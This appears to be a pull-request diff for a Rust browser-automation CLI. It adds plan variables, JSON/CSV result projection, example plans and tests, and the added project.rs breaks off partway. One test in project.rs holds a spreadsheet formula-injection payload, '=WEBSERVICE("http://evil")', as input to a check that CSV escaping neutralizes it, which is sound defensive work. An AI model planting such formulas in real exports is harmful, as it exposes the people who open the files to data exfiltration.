### PR TITLE
feat(browser): add plan variables and JSON/CSV projection

### DIFF
--- a/crates/horizon-browser-cli/README.md
+++ b/crates/horizon-browser-cli/README.md
@@ -136,7 +136,9 @@ combined). Optional `project` writes `projection.json` or `projection.csv` into
 the job directory from a `$ref` after the referenced step succeeds. CSV uses
 CRLF records, requires an array of objects, and prefixes formula-leading text
 cells with `'` after skipping leading whitespace or control characters;
-`columns` selects fields. The runner checks every tool
+`columns` selects fields. A requested projection that exceeds 1 MiB, 10,000
+CSV rows, or 32 columns fails the run after the browser steps complete. The
+runner checks every tool
 against `tools/list` before making the first call, stops after the first failed
 step, and never copies tool arguments into its report. Plans are limited to
 1 MiB and 256 steps.

--- a/crates/horizon-browser-cli/README.md
+++ b/crates/horizon-browser-cli/README.md
@@ -131,10 +131,11 @@ A plan is a sequence of literal MCP tool names and arguments:
 An exact `{"$ref":"step-id#/json/pointer"}` value reads typed structured
 content from an earlier successful step using RFC 6901 JSON Pointer syntax.
 References cannot point forward. An exact `{"$var":"name"}` value reads a
-plan-level JSON literal from `variables` (at most 32 names, 4 KiB each).
-Optional `project` writes `projection.json` or `projection.csv` into the job
-directory from a `$ref` after the referenced step succeeds. CSV requires an
-array of objects; `columns` selects fields. The runner checks every tool
+plan-level JSON literal from `variables` (at most 32 names, 4 KiB each, 128 KiB
+combined). Optional `project` writes `projection.json` or `projection.csv` into
+the job directory from a `$ref` after the referenced step succeeds. CSV uses
+CRLF records, requires an array of objects, and prefixes formula-leading text
+cells with `'`; `columns` selects fields. The runner checks every tool
 against `tools/list` before making the first call, stops after the first failed
 step, and never copies tool arguments into its report. Plans are limited to
 1 MiB and 256 steps.

--- a/crates/horizon-browser-cli/README.md
+++ b/crates/horizon-browser-cli/README.md
@@ -130,10 +130,24 @@ A plan is a sequence of literal MCP tool names and arguments:
 
 An exact `{"$ref":"step-id#/json/pointer"}` value reads typed structured
 content from an earlier successful step using RFC 6901 JSON Pointer syntax.
-References cannot point forward. The runner checks every tool against
-`tools/list` before making the first call, stops after the first failed step,
-and never copies tool arguments into its report. Plans are limited to 1 MiB and
-256 steps.
+References cannot point forward. An exact `{"$var":"name"}` value reads a
+plan-level JSON literal from `variables` (at most 32 names, 4 KiB each).
+Optional `project` writes `projection.json` or `projection.csv` into the job
+directory from a `$ref` after the referenced step succeeds. CSV requires an
+array of objects; `columns` selects fields. The runner checks every tool
+against `tools/list` before making the first call, stops after the first failed
+step, and never copies tool arguments into its report. Plans are limited to
+1 MiB and 256 steps.
+
+Checked examples for navigation, DOM extraction, interaction, and network
+monitoring live next to this crate:
+
+```bash
+horizon-browser run crates/horizon-browser-cli/examples/navigate.json
+horizon-browser run crates/horizon-browser-cli/examples/extract.json
+horizon-browser run crates/horizon-browser-cli/examples/interact.json
+horizon-browser run crates/horizon-browser-cli/examples/network-watch.json
+```
 
 The report is JSON with top-level `job_id`, `job_dir`, `state_path`, `ok`,
 `completed_steps`, ordered step results, and an `observability` summary of

--- a/crates/horizon-browser-cli/README.md
+++ b/crates/horizon-browser-cli/README.md
@@ -135,7 +135,8 @@ plan-level JSON literal from `variables` (at most 32 names, 4 KiB each, 128 KiB
 combined). Optional `project` writes `projection.json` or `projection.csv` into
 the job directory from a `$ref` after the referenced step succeeds. CSV uses
 CRLF records, requires an array of objects, and prefixes formula-leading text
-cells with `'`; `columns` selects fields. The runner checks every tool
+cells with `'` after skipping leading whitespace or control characters;
+`columns` selects fields. The runner checks every tool
 against `tools/list` before making the first call, stops after the first failed
 step, and never copies tool arguments into its report. Plans are limited to
 1 MiB and 256 steps.

--- a/crates/horizon-browser-cli/examples/extract.json
+++ b/crates/horizon-browser-cli/examples/extract.json
@@ -1,0 +1,43 @@
+{
+  "version": 1,
+  "variables": {
+    "url": "https://example.com",
+    "expression": "Array.from(document.querySelectorAll('a'), (node) => ({ title: node.textContent.trim(), href: node.href })).filter((row) => row.title && row.href).slice(0, 20)"
+  },
+  "steps": [
+    {
+      "id": "panels",
+      "tool": "browser_list"
+    },
+    {
+      "id": "open",
+      "tool": "browser_navigate",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "url": { "$var": "url" }
+      }
+    },
+    {
+      "id": "ready",
+      "tool": "browser_wait",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "selector": "body",
+        "state": "present"
+      }
+    },
+    {
+      "id": "links",
+      "tool": "browser_evaluate",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "expression": { "$var": "expression" }
+      }
+    }
+  ],
+  "project": {
+    "format": "csv",
+    "from": { "$ref": "links#/value" },
+    "columns": ["title", "href"]
+  }
+}

--- a/crates/horizon-browser-cli/examples/interact.json
+++ b/crates/horizon-browser-cli/examples/interact.json
@@ -1,0 +1,40 @@
+{
+  "version": 1,
+  "variables": {
+    "url": "https://example.com",
+    "selector": "input",
+    "value": "horizon"
+  },
+  "steps": [
+    {
+      "id": "panels",
+      "tool": "browser_list"
+    },
+    {
+      "id": "open",
+      "tool": "browser_navigate",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "url": { "$var": "url" }
+      }
+    },
+    {
+      "id": "matches",
+      "tool": "browser_query",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "selector": { "$var": "selector" }
+      }
+    },
+    {
+      "id": "fill",
+      "tool": "browser_act",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "action": "fill",
+        "selector": { "$var": "selector" },
+        "value": { "$var": "value" }
+      }
+    }
+  ]
+}

--- a/crates/horizon-browser-cli/examples/interact.json
+++ b/crates/horizon-browser-cli/examples/interact.json
@@ -18,6 +18,15 @@
       }
     },
     {
+      "id": "ready",
+      "tool": "browser_wait",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "selector": { "$var": "selector" },
+        "state": "present"
+      }
+    },
+    {
       "id": "matches",
       "tool": "browser_query",
       "arguments": {

--- a/crates/horizon-browser-cli/examples/interact.json
+++ b/crates/horizon-browser-cli/examples/interact.json
@@ -2,8 +2,7 @@
   "version": 1,
   "variables": {
     "url": "https://example.com",
-    "selector": "input",
-    "value": "horizon"
+    "selector": "a"
   },
   "steps": [
     {
@@ -27,13 +26,12 @@
       }
     },
     {
-      "id": "fill",
+      "id": "click",
       "tool": "browser_act",
       "arguments": {
         "panel_id": { "$ref": "panels#/panels/0/panel_id" },
-        "action": "fill",
-        "selector": { "$var": "selector" },
-        "value": { "$var": "value" }
+        "action": "click",
+        "selector": { "$var": "selector" }
       }
     }
   ]

--- a/crates/horizon-browser-cli/examples/navigate.json
+++ b/crates/horizon-browser-cli/examples/navigate.json
@@ -1,0 +1,29 @@
+{
+  "version": 1,
+  "variables": {
+    "url": "https://example.com"
+  },
+  "steps": [
+    {
+      "id": "panels",
+      "tool": "browser_list"
+    },
+    {
+      "id": "open",
+      "tool": "browser_navigate",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "url": { "$var": "url" }
+      }
+    },
+    {
+      "id": "ready",
+      "tool": "browser_wait",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "selector": "body",
+        "state": "present"
+      }
+    }
+  ]
+}

--- a/crates/horizon-browser-cli/examples/network-watch.json
+++ b/crates/horizon-browser-cli/examples/network-watch.json
@@ -1,0 +1,49 @@
+{
+  "version": 1,
+  "variables": {
+    "url": "https://example.com"
+  },
+  "steps": [
+    {
+      "id": "panels",
+      "tool": "browser_list"
+    },
+    {
+      "id": "capture",
+      "tool": "browser_network",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "operation": "start",
+        "include_http": true
+      }
+    },
+    {
+      "id": "open",
+      "tool": "browser_navigate",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "url": { "$var": "url" }
+      }
+    },
+    {
+      "id": "records",
+      "tool": "browser_network_watch",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "capture_id": { "$ref": "capture#/capture_id" }
+      }
+    },
+    {
+      "id": "stop",
+      "tool": "browser_network",
+      "arguments": {
+        "panel_id": { "$ref": "panels#/panels/0/panel_id" },
+        "operation": "stop"
+      }
+    }
+  ],
+  "project": {
+    "format": "json",
+    "from": { "$ref": "records#/records" }
+  }
+}

--- a/crates/horizon-browser-cli/src/checkpoint.rs
+++ b/crates/horizon-browser-cli/src/checkpoint.rs
@@ -276,11 +276,13 @@ mod tests {
     fn plan() -> Plan {
         Plan {
             version: 1,
+            variables: std::collections::BTreeMap::new(),
             steps: vec![
                 step("list", "browser_list"),
                 step("navigate", "browser_navigate"),
                 step("title", "browser_evaluate"),
             ],
+            project: None,
         }
     }
 

--- a/crates/horizon-browser-cli/src/job/report.rs
+++ b/crates/horizon-browser-cli/src/job/report.rs
@@ -329,7 +329,15 @@ impl JobTrace {
                 }
             })
             .collect();
-        (Plan { version: 1, steps }, self.replayable)
+        (
+            Plan {
+                version: 1,
+                variables: std::collections::BTreeMap::new(),
+                steps,
+                project: None,
+            },
+            self.replayable,
+        )
     }
 }
 

--- a/crates/horizon-browser-cli/src/lib.rs
+++ b/crates/horizon-browser-cli/src/lib.rs
@@ -10,8 +10,10 @@ pub mod checkpoint;
 pub mod execution_control;
 pub mod job;
 pub mod observability;
+pub mod project;
 pub mod run_state;
 pub mod standalone;
+mod variables;
 
 use std::cell::Cell;
 use std::collections::{BTreeMap, BTreeSet};
@@ -28,6 +30,7 @@ use thiserror::Error;
 
 use execution_control::{ExecutionControl, ExecutionStopReason};
 use observability::ObservabilitySummary;
+use project::{PlanProject, ProjectionSummary};
 use run_state::{CheckpointPersistError, DurableRun};
 
 const PLAN_VERSION: u32 = 1;
@@ -41,8 +44,14 @@ const MCP_SHUTDOWN_TIMEOUT: Duration = Duration::from_secs(5);
 pub struct Plan {
     /// Plan format version. The only supported value is `1`.
     pub version: u32,
+    /// Bounded JSON literals substituted with `{"$var":"name"}`.
+    #[serde(default, skip_serializing_if = "BTreeMap::is_empty")]
+    pub variables: BTreeMap<String, Value>,
     /// Tool calls in execution order.
     pub steps: Vec<PlanStep>,
+    /// Optional JSON or CSV projection of a prior structured result.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub project: Option<PlanProject>,
 }
 
 /// One named MCP tool call in a [`Plan`].
@@ -54,7 +63,8 @@ pub struct PlanStep {
     /// Exact MCP tool name, such as `browser_list` or `browser_navigate`.
     pub tool: String,
     /// MCP tool arguments. An exact `{"$ref":"step#/pointer"}` object is
-    /// replaced with a prior step's typed structured result value.
+    /// replaced with a prior step's typed structured result value, and
+    /// `{"$var":"name"}` is replaced with a plan variable.
     #[serde(default)]
     pub arguments: Map<String, Value>,
 }
@@ -78,6 +88,9 @@ pub struct ExecutionReport {
     pub stop_reason: Option<ExecutionStopReason>,
     /// Audit completeness and network-capture health from executed MCP results.
     pub observability: ObservabilitySummary,
+    /// Optional JSON/CSV projection written next to the durable report.
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub projection: Option<ProjectionSummary>,
 }
 
 /// Prefix reused by an explicit resume and optional durable checkpoint sink.
@@ -138,6 +151,28 @@ pub enum PlanError {
     /// A `$ref` names a step that is not earlier in the plan.
     #[error("step `{step}` references unavailable prior step `{target}`")]
     UnavailableReference { step: String, target: String },
+    /// The plan declares more variables than the runner accepts.
+    #[error("plan has {actual} variables; the maximum is {maximum}")]
+    TooManyVariables { actual: usize, maximum: usize },
+    /// A variable name is malformed or its value is not a literal.
+    #[error("invalid plan variable `{0}`")]
+    InvalidVariableName(String),
+    /// A single variable value exceeds the encoded-size bound.
+    #[error("plan variable `{name}` is {actual} bytes; the maximum is {maximum}")]
+    VariableTooLarge {
+        name: String,
+        actual: usize,
+        maximum: usize,
+    },
+    /// Combined variable values exceed the encoded-size bound.
+    #[error("plan variables total {actual} bytes; the maximum is {maximum}")]
+    VariablesTooLarge { actual: usize, maximum: usize },
+    /// A `$var` names a missing plan variable.
+    #[error("step `{step}` references unknown variable `{name}`")]
+    UnknownVariable { step: String, name: String },
+    /// The optional result projection is malformed.
+    #[error("invalid plan projection: {0}")]
+    InvalidProject(String),
 }
 
 /// Failure to initialize or use the in-process MCP connection.
@@ -348,7 +383,7 @@ async fn execute_steps(
     let mut steps = completed;
     let mut persistence_error = None;
     for step in plan.steps.iter().skip(start_index) {
-        let arguments = match resolve_arguments(step, &steps, &result_indexes) {
+        let arguments = match resolve_arguments(plan, step, &steps, &result_indexes) {
             Ok(arguments) => arguments,
             Err(error) => {
                 steps.push(failed_step(step, error));
@@ -421,7 +456,19 @@ fn completed_execution_report(
     } else {
         None
     };
-    execution_report(ok, steps, error, None)
+    with_projection(plan, execution_report(ok, steps, error, None))
+}
+
+fn with_projection(plan: &Plan, mut report: ExecutionReport) -> ExecutionReport {
+    match project::summarize(plan, &report.steps) {
+        Ok(projection) => report.projection = projection,
+        Err(error) if report.ok => {
+            report.ok = false;
+            report.error = Some(error);
+        }
+        Err(_) => {}
+    }
+    report
 }
 
 fn stop_execution(steps: Vec<StepReport>, reason: ExecutionStopReason, request_started: bool) -> ExecutionReport {
@@ -649,6 +696,7 @@ fn execution_report(
         error,
         stop_reason,
         observability,
+        projection: None,
     }
 }
 
@@ -702,13 +750,17 @@ fn validate_plan(plan: &Plan) -> Result<(), PlanError> {
                 tool: step.tool.clone(),
             });
         }
-        validate_references(&Value::Object(step.arguments.clone()), step, &prior)?;
+        validate_references(&Value::Object(step.arguments.clone()), step, &prior, &plan.variables)?;
         prior.insert(step.id.clone());
+    }
+    variables::validate(&plan.variables)?;
+    if let Some(project) = &plan.project {
+        project::validate(project, &plan.steps)?;
     }
     Ok(())
 }
 
-fn valid_identifier(value: &str) -> bool {
+pub(crate) fn valid_identifier(value: &str) -> bool {
     !value.is_empty()
         && value.len() <= 64
         && value
@@ -724,35 +776,56 @@ fn valid_tool_name(value: &str) -> bool {
             .all(|byte| byte.is_ascii_alphanumeric() || matches!(byte, b'_' | b'-' | b'.'))
 }
 
-fn validate_references(value: &Value, step: &PlanStep, prior: &BTreeSet<String>) -> Result<(), PlanError> {
+fn validate_references(
+    value: &Value,
+    step: &PlanStep,
+    prior: &BTreeSet<String>,
+    variables: &BTreeMap<String, Value>,
+) -> Result<(), PlanError> {
     match value {
         Value::Array(values) => {
             for value in values {
-                validate_references(value, step, prior)?;
+                validate_references(value, step, prior, variables)?;
             }
         }
-        Value::Object(object) if object.contains_key("$ref") => {
+        Value::Object(object) if object.contains_key("$ref") || object.contains_key("$var") => {
             if object.len() != 1 {
-                return Err(invalid_reference(step, "a $ref object cannot contain other fields"));
+                return Err(invalid_reference(
+                    step,
+                    "a $ref or $var object cannot contain other fields",
+                ));
             }
-            let reference = object
-                .get("$ref")
-                .and_then(Value::as_str)
-                .ok_or_else(|| invalid_reference(step, "$ref must be a string"))?;
-            let (target, pointer) = parse_reference(step, reference)?;
-            if !prior.contains(target) {
-                return Err(PlanError::UnavailableReference {
-                    step: step.id.clone(),
-                    target: target.to_string(),
-                });
-            }
-            if !pointer.is_empty() && !pointer.starts_with('/') {
-                return Err(invalid_reference(step, "JSON pointer must be empty or start with `/`"));
+            if object.contains_key("$ref") {
+                let reference = object
+                    .get("$ref")
+                    .and_then(Value::as_str)
+                    .ok_or_else(|| invalid_reference(step, "$ref must be a string"))?;
+                let (target, pointer) = parse_reference(step, reference)?;
+                if !prior.contains(target) {
+                    return Err(PlanError::UnavailableReference {
+                        step: step.id.clone(),
+                        target: target.to_string(),
+                    });
+                }
+                if !pointer.is_empty() && !pointer.starts_with('/') {
+                    return Err(invalid_reference(step, "JSON pointer must be empty or start with `/`"));
+                }
+            } else {
+                let name = object
+                    .get("$var")
+                    .and_then(Value::as_str)
+                    .ok_or_else(|| invalid_reference(step, "$var must be a string"))?;
+                if !variables.contains_key(name) {
+                    return Err(PlanError::UnknownVariable {
+                        step: step.id.clone(),
+                        name: name.to_string(),
+                    });
+                }
             }
         }
         Value::Object(object) => {
             for value in object.values() {
-                validate_references(value, step, prior)?;
+                validate_references(value, step, prior, variables)?;
             }
         }
         _ => {}
@@ -761,27 +834,35 @@ fn validate_references(value: &Value, step: &PlanStep, prior: &BTreeSet<String>)
 }
 
 fn resolve_arguments(
+    plan: &Plan,
     step: &PlanStep,
     results: &[StepReport],
     result_indexes: &BTreeMap<String, usize>,
 ) -> Result<Map<String, Value>, String> {
-    let resolved = resolve_value(&Value::Object(step.arguments.clone()), step, results, result_indexes)?;
+    let resolved = resolve_value(
+        &Value::Object(step.arguments.clone()),
+        step,
+        results,
+        result_indexes,
+        &plan.variables,
+    )?;
     resolved
         .as_object()
         .cloned()
         .ok_or_else(|| "resolved MCP arguments were not an object".to_string())
 }
 
-fn resolve_value(
+pub(crate) fn resolve_value(
     value: &Value,
     step: &PlanStep,
     results: &[StepReport],
     result_indexes: &BTreeMap<String, usize>,
+    variables: &BTreeMap<String, Value>,
 ) -> Result<Value, String> {
     match value {
         Value::Array(values) => values
             .iter()
-            .map(|value| resolve_value(value, step, results, result_indexes))
+            .map(|value| resolve_value(value, step, results, result_indexes, variables))
             .collect::<Result<Vec<_>, _>>()
             .map(Value::Array),
         Value::Object(object) if object.len() == 1 && object.contains_key("$ref") => {
@@ -800,12 +881,37 @@ fn resolve_value(
                 .cloned()
                 .ok_or_else(|| format!("reference `{reference}` did not match the prior structured result"))
         }
+        Value::Object(object) if object.len() == 1 && object.contains_key("$var") => {
+            let name = object
+                .get("$var")
+                .and_then(Value::as_str)
+                .ok_or_else(|| "$var must be a string".to_string())?;
+            variables::lookup(variables, step, name).map_err(|error| error.to_string())
+        }
         Value::Object(object) => object
             .iter()
-            .map(|(key, value)| Ok((key.clone(), resolve_value(value, step, results, result_indexes)?)))
+            .map(|(key, value)| {
+                Ok((
+                    key.clone(),
+                    resolve_value(value, step, results, result_indexes, variables)?,
+                ))
+            })
             .collect::<Result<Map<_, _>, String>>()
             .map(Value::Object),
         _ => Ok(value.clone()),
+    }
+}
+
+pub(crate) fn parse_project_reference(reference: &str) -> Result<(&str, &str), PlanError> {
+    let placeholder = PlanStep {
+        id: "project".to_string(),
+        tool: "project".to_string(),
+        arguments: Map::new(),
+    };
+    match parse_reference(&placeholder, reference) {
+        Ok(parsed) => Ok(parsed),
+        Err(PlanError::InvalidReference { reason, .. }) => Err(PlanError::InvalidProject(reason)),
+        Err(error) => Err(error),
     }
 }
 
@@ -866,7 +972,7 @@ mod tests {
             json!({"nested":{"panel/id":"panel-7"},"visible":true}),
         )];
         let indexes = BTreeMap::from([("list".to_string(), 0)]);
-        let resolved = resolve_arguments(&plan.steps[1], &results, &indexes).expect("resolve arguments");
+        let resolved = resolve_arguments(&plan, &plan.steps[1], &results, &indexes).expect("resolve arguments");
         assert_eq!(resolved["panel_id"], "panel-7");
         assert_eq!(resolved["visible"], true);
     }
@@ -878,8 +984,39 @@ mod tests {
         );
         let results = [successful_step("list", json!({"panels":[]}))];
         let indexes = BTreeMap::from([("list".to_string(), 0)]);
-        let error = resolve_arguments(&plan.steps[1], &results, &indexes).expect_err("missing pointer");
+        let error = resolve_arguments(&plan, &plan.steps[1], &results, &indexes).expect_err("missing pointer");
         assert!(error.contains("did not match"));
+    }
+
+    #[test]
+    fn example_plans_are_valid() {
+        for (name, bytes) in [
+            ("navigate", include_str!("../examples/navigate.json").as_bytes()),
+            ("extract", include_str!("../examples/extract.json").as_bytes()),
+            ("interact", include_str!("../examples/interact.json").as_bytes()),
+            (
+                "network-watch",
+                include_str!("../examples/network-watch.json").as_bytes(),
+            ),
+        ] {
+            Plan::from_slice(bytes).unwrap_or_else(|error| panic!("{name}: {error}"));
+        }
+    }
+
+    #[test]
+    fn variables_substitute_literals_into_later_arguments() {
+        let plan = plan(
+            br#"{"version":1,"variables":{"url":"https://example.com"},"steps":[{"id":"list","tool":"browser_list"},{"id":"go","tool":"browser_navigate","arguments":{"panel_id":{"$ref":"list#/panels/0/panel_id"},"url":{"$var":"url"}}}]}"#,
+        );
+        let results = [successful_step("list", json!({"panels":[{"panel_id":"p1"}]}))];
+        let indexes = BTreeMap::from([("list".to_string(), 0)]);
+        let resolved = resolve_arguments(&plan, &plan.steps[1], &results, &indexes).expect("resolve var");
+        assert_eq!(resolved["panel_id"], "p1");
+        assert_eq!(resolved["url"], "https://example.com");
+        assert!(matches!(
+            Plan::from_slice(br#"{"version":1,"steps":[{"id":"go","tool":"browser_navigate","arguments":{"url":{"$var":"missing"}}}]}"#),
+            Err(PlanError::UnknownVariable { name, .. }) if name == "missing"
+        ));
     }
 
     #[tokio::test]

--- a/crates/horizon-browser-cli/src/lib.rs
+++ b/crates/horizon-browser-cli/src/lib.rs
@@ -1020,6 +1020,24 @@ mod tests {
     }
 
     #[tokio::test]
+    async fn requested_projection_failure_fails_an_otherwise_successful_run() {
+        let plan = plan(
+            br#"{"version":1,"steps":[{"id":"panels","tool":"browser_list"}],"project":{"format":"csv","from":{"$ref":"panels#"}}}"#,
+        );
+        let report = execute_plan(&plan).await.expect("list-only plan should execute");
+        assert!(!report.ok);
+        assert!(report.projection.is_none());
+        assert!(
+            report
+                .error
+                .as_deref()
+                .is_some_and(|error| error.contains("csv projection requires the referenced value to be a JSON array")),
+            "error: {:?}",
+            report.error
+        );
+    }
+
+    #[tokio::test]
     async fn expired_control_stops_before_mcp_initialization() {
         let plan = plan(br#"{"version":1,"steps":[{"id":"list","tool":"browser_list"}]}"#);
         let mut control = ExecutionControl::with_timeout(Duration::ZERO);

--- a/crates/horizon-browser-cli/src/project.rs
+++ b/crates/horizon-browser-cli/src/project.rs
@@ -248,7 +248,8 @@ fn csv_cell(value: &Value) -> String {
 }
 
 fn csv_safe_text(text: &str) -> String {
-    if text.starts_with(['=', '+', '-', '@']) {
+    let significant = text.trim_start_matches(|ch: char| ch.is_whitespace() || ch.is_control() || ch == '\u{feff}');
+    if significant.starts_with(['=', '+', '-', '@']) {
         let mut escaped = String::with_capacity(text.len() + 1);
         escaped.push('\'');
         escaped.push_str(text);
@@ -383,6 +384,16 @@ mod tests {
         let (value, _) = projected_value(plan.project.as_ref().expect("project"), &steps).expect("value");
         let csv = encode(plan.project.as_ref().expect("project"), &value).expect("csv");
         assert_eq!(String::from_utf8(csv).expect("utf8"), "'=cmd,n\r\n'=1+1,2\r\n");
+        let tabbed = [step(
+            "extract",
+            json!({"items":[{"=cmd":"\t=WEBSERVICE(\"http://evil\")","n":2}]}),
+        )];
+        let (value, _) = projected_value(plan.project.as_ref().expect("project"), &tabbed).expect("value");
+        let csv = encode(plan.project.as_ref().expect("project"), &value).expect("csv");
+        assert_eq!(
+            String::from_utf8(csv).expect("utf8"),
+            "'=cmd,n\r\n\"'\t=WEBSERVICE(\"\"http://evil\"\")\",2\r\n"
+        );
     }
 
     #[test]

--- a/crates/horizon-browser-cli/src/project.rs
+++ b/crates/horizon-browser-cli/src/project.rs
@@ -201,7 +201,8 @@ fn encode_csv(value: &Value, columns: &[String]) -> Result<Vec<u8>, String> {
     }
     let mut out = Vec::new();
     if !headers.is_empty() {
-        write_csv_row(&mut out, headers.iter().map(String::as_str));
+        let header_cells = headers.iter().map(|header| csv_safe_text(header)).collect::<Vec<_>>();
+        write_csv_row(&mut out, header_cells.iter().map(String::as_str));
     }
     for row in rows {
         let object = row
@@ -210,7 +211,7 @@ fn encode_csv(value: &Value, columns: &[String]) -> Result<Vec<u8>, String> {
         let cells = headers
             .iter()
             .map(|header| match object.get(header) {
-                Some(Value::String(text)) => text.clone(),
+                Some(Value::String(text)) => csv_safe_text(text),
                 Some(Value::Null) | None => String::new(),
                 Some(other) => csv_cell(other),
             })
@@ -238,11 +239,22 @@ fn csv_headers(rows: &[Value]) -> Result<Vec<String>, String> {
 
 fn csv_cell(value: &Value) -> String {
     match value {
-        Value::String(text) => text.clone(),
+        Value::String(text) => csv_safe_text(text),
         Value::Number(number) => number.to_string(),
         Value::Bool(flag) => flag.to_string(),
         Value::Null => String::new(),
-        other => serde_json::to_string(other).unwrap_or_default(),
+        other => csv_safe_text(&serde_json::to_string(other).unwrap_or_default()),
+    }
+}
+
+fn csv_safe_text(text: &str) -> String {
+    if text.starts_with(['=', '+', '-', '@']) {
+        let mut escaped = String::with_capacity(text.len() + 1);
+        escaped.push('\'');
+        escaped.push_str(text);
+        escaped
+    } else {
+        text.to_string()
     }
 }
 
@@ -258,7 +270,7 @@ where
         first = false;
         write_csv_field(out, field);
     }
-    out.push(b'\n');
+    out.extend_from_slice(b"\r\n");
 }
 
 fn write_csv_field(out: &mut Vec<u8>, field: &str) {
@@ -347,7 +359,50 @@ mod tests {
         let csv = encode(plan.project.as_ref().expect("project"), &value).expect("csv");
         assert_eq!(
             String::from_utf8(csv).expect("utf8"),
-            "title,price\n\"Widget, large\",12\nBolt,1\n"
+            "title,price\r\n\"Widget, large\",12\r\nBolt,1\r\n"
         );
+    }
+
+    #[test]
+    fn csv_projection_neutralizes_formula_leading_text() {
+        let plan = Plan {
+            version: 1,
+            variables: BTreeMap::new(),
+            steps: vec![PlanStep {
+                id: "extract".to_string(),
+                tool: "browser_evaluate".to_string(),
+                arguments: Map::new(),
+            }],
+            project: Some(PlanProject {
+                format: ProjectFormat::Csv,
+                from: json!({"$ref":"extract#/items"}),
+                columns: vec!["=cmd".to_string(), "n".to_string()],
+            }),
+        };
+        let steps = [step("extract", json!({"items":[{"=cmd":"=1+1","n":2}]}))];
+        let (value, _) = projected_value(plan.project.as_ref().expect("project"), &steps).expect("value");
+        let csv = encode(plan.project.as_ref().expect("project"), &value).expect("csv");
+        assert_eq!(String::from_utf8(csv).expect("utf8"), "'=cmd,n\r\n'=1+1,2\r\n");
+    }
+
+    #[test]
+    fn json_projection_fails_on_a_missing_pointer() {
+        let plan = Plan {
+            version: 1,
+            variables: BTreeMap::new(),
+            steps: vec![PlanStep {
+                id: "extract".to_string(),
+                tool: "browser_evaluate".to_string(),
+                arguments: Map::new(),
+            }],
+            project: Some(PlanProject {
+                format: ProjectFormat::Json,
+                from: json!({"$ref":"extract#/missing"}),
+                columns: Vec::new(),
+            }),
+        };
+        let steps = [step("extract", json!({"items":[]}))];
+        let error = summarize(&plan, &steps).expect_err("missing pointer");
+        assert!(error.contains("did not match"));
     }
 }

--- a/crates/horizon-browser-cli/src/project.rs
+++ b/crates/horizon-browser-cli/src/project.rs
@@ -1,0 +1,353 @@
+//! Optional JSON or CSV projection of a prior structured step result.
+
+use std::collections::BTreeMap;
+use std::io::Write as _;
+use std::path::Path;
+
+use atomicwrites::{AllowOverwrite, AtomicFile};
+use serde::{Deserialize, Serialize};
+use serde_json::{Map, Value};
+
+use crate::{Plan, PlanError, PlanStep, StepReport};
+
+const MAX_CSV_ROWS: usize = 10_000;
+const MAX_CSV_COLUMNS: usize = 32;
+const MAX_PROJECTION_BYTES: usize = 1024 * 1024;
+
+/// How a plan projects a prior structured result.
+#[derive(Clone, Copy, Debug, Deserialize, Eq, PartialEq, Serialize)]
+#[serde(rename_all = "snake_case")]
+pub enum ProjectFormat {
+    /// Write the referenced JSON value.
+    Json,
+    /// Write an array of objects as RFC 4180 CSV.
+    Csv,
+}
+
+/// Optional result projection declared on a plan.
+#[derive(Clone, Debug, Deserialize, PartialEq, Serialize)]
+#[serde(deny_unknown_fields)]
+pub struct PlanProject {
+    /// Output encoding.
+    pub format: ProjectFormat,
+    /// Exact `{"$ref":"step#/pointer"}` selecting the projected value.
+    pub from: Value,
+    /// CSV column names. When empty, the first object's keys are used.
+    #[serde(default, skip_serializing_if = "Vec::is_empty")]
+    pub columns: Vec<String>,
+}
+
+/// Compact record of a written projection.
+#[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize)]
+pub struct ProjectionSummary {
+    /// Encoding that was written.
+    pub format: ProjectFormat,
+    /// Job-directory-relative file name.
+    pub file: String,
+    /// Number of projected array rows, or 1 for a non-array JSON value.
+    pub rows: usize,
+}
+
+pub(crate) fn validate(project: &PlanProject, steps: &[PlanStep]) -> Result<(), PlanError> {
+    let Some(object) = project.from.as_object() else {
+        return Err(PlanError::InvalidProject(
+            "project.from must be an exact $ref object".to_string(),
+        ));
+    };
+    if object.len() != 1 || !object.contains_key("$ref") {
+        return Err(PlanError::InvalidProject(
+            "project.from must be an exact $ref object".to_string(),
+        ));
+    }
+    let reference = object
+        .get("$ref")
+        .and_then(Value::as_str)
+        .ok_or_else(|| PlanError::InvalidProject("project.from $ref must be a string".to_string()))?;
+    let (target, pointer) = crate::parse_project_reference(reference)?;
+    if !steps.iter().any(|step| step.id == target) {
+        return Err(PlanError::InvalidProject(format!(
+            "project.from references unknown step `{target}`"
+        )));
+    }
+    if !pointer.is_empty() && !pointer.starts_with('/') {
+        return Err(PlanError::InvalidProject(
+            "project.from JSON pointer must be empty or start with `/`".to_string(),
+        ));
+    }
+    if project.format != ProjectFormat::Csv && !project.columns.is_empty() {
+        return Err(PlanError::InvalidProject(
+            "project.columns is only accepted for csv".to_string(),
+        ));
+    }
+    if project.columns.len() > MAX_CSV_COLUMNS {
+        return Err(PlanError::InvalidProject(format!(
+            "project.columns has {} names; the maximum is {MAX_CSV_COLUMNS}",
+            project.columns.len()
+        )));
+    }
+    if project
+        .columns
+        .iter()
+        .any(|column| column.is_empty() || column.len() > 64 || column.bytes().any(|byte| byte < b' '))
+    {
+        return Err(PlanError::InvalidProject(
+            "project.columns names must be 1-64 characters without control bytes".to_string(),
+        ));
+    }
+    Ok(())
+}
+
+pub(crate) fn summarize(plan: &Plan, steps: &[StepReport]) -> Result<Option<ProjectionSummary>, String> {
+    let Some(project) = &plan.project else {
+        return Ok(None);
+    };
